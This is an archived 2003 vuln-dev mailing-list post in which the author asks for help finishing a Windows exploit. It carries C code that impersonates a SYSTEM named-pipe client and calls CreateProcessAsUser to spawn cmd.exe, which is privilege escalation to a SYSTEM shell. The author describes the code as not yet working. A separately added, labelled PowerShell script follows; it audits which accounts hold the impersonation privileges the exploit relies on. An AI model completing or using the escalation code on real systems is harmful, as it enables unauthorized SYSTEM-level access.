Named Pipe Impersonation -> CreateProcessAsUser();

From: wirepair (wirepair_at_roguemail.net)
Date: 07/14/03

  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"
    To: vuln-dev@securityfocus.com
    Date: Mon, 14 Jul 2003 12:45:37 -0700
    
    

    Hello, I'm attempting to finish up my exploit for the
    @stake advisory. I've hit quite a snag: I found out
    that calling a new process does not inherit the privileges
    of the named pipe. (I must have been thinking of fork() or
    something, heh.) So I can impersonate SYSTEM, but I cannot
    create a new process with these nice privileges. Here is
    where I am at:
    ConnectNamedPipe() <-- yada yada wait for connection
    if (!ImpersonateNamedPipeClient(hPipe)) // impersonate the pipe so we now are SYSTEM.
    {
        printf("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
    }
    // found this on MSDN, I'm trying to get a token with full
    // access, then call CreateProcessAsUser();
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken)) {
        if (hToken != INVALID_HANDLE_VALUE) {
            CloseHandle(hToken);
            printf("damn: %u\n", GetLastError());
        }
    }

    MapGenericMask(&dwAccessDesired, pGeneric); // this I'm kinda shady on, looks like
    // I'm just mapping the id to the SYSTEM name? When I call GetUserName I get
    // garble after the OpenThreadToken unless I call MapGenericMask...

    CreateProcessAsUser(hToken, "cmd.exe", NULL, NULL, NULL, true, NULL, NULL, NULL, &si, &pi);
    CloseHandle(hPipe);

    Now I call CreateProcessAsUser() using the token from
    OpenThreadToken(). In the debugger, it tries to execute cmd,
    but I get nothing back... If anyone wants to see my
    code, it's at http://sh0dan.org/files/tac0tac0.c... Thanks,
    this is starting to bug me :),
    -wire
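    A defender-side check that follows from the thread, as an added example that is not part of wirepair's post or the exploit it describes: the privileges gating this technique (SeImpersonatePrivilege, which is what lets a pipe server impersonate its client beyond identification level, plus SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege, which CreateProcessAsUser requires of its caller) can be audited on a host with the stock secedit.exe export. The scratch file path is an assumption; run it from an elevated prompt.

```powershell
# Added example (not from the original post): list which principals on this host hold the
# privileges involved in named-pipe impersonation and CreateProcessAsUser.
# Requires an elevated prompt; secedit.exe is a stock Windows tool.
$exportPath = Join-Path $env:TEMP 'privs-audit.inf'   # assumed scratch location
& secedit.exe /export /cfg $exportPath /areas USER_RIGHTS | Out-Null
if (-not (Test-Path $exportPath)) { throw "secedit export failed (is the prompt elevated?)" }

$watch = @(
    'SeImpersonatePrivilege',         # impersonate a client beyond Identification level
    'SeAssignPrimaryTokenPrivilege',  # CreateProcessAsUser requirement (SE_ASSIGNPRIMARYTOKEN_NAME)
    'SeIncreaseQuotaPrivilege'        # CreateProcessAsUser requirement (SE_INCREASE_QUOTA_NAME)
)

function Resolve-PrincipalName([string]$entry) {
    # secedit writes SIDs with a leading '*'; plain account names are written as-is
    if (-not $entry.StartsWith('*')) { return $entry }
    $sid = New-Object System.Security.Principal.SecurityIdentifier ($entry.TrimStart('*'))
    try { return $sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { return $entry }   # orphaned SID: report it raw rather than hide it
}

$results = foreach ($line in Get-Content $exportPath) {
    # [Privilege Rights] lines look like: SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6
    if ($line -notmatch '^(Se\w+Privilege)\s*=\s*(.*)$') { continue }
    $priv, $holders = $matches[1], $matches[2]
    if ($watch -notcontains $priv) { continue }
    foreach ($h in ($holders -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })) {
        [pscustomobject]@{ Privilege = $priv; Holder = (Resolve-PrincipalName $h) }
    }
}
Remove-Item $exportPath -ErrorAction SilentlyContinue

# Anything beyond Administrators and the built-in service accounts deserves a second look.
$results | Sort-Object Privilege, Holder | Format-Table -AutoSize
```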
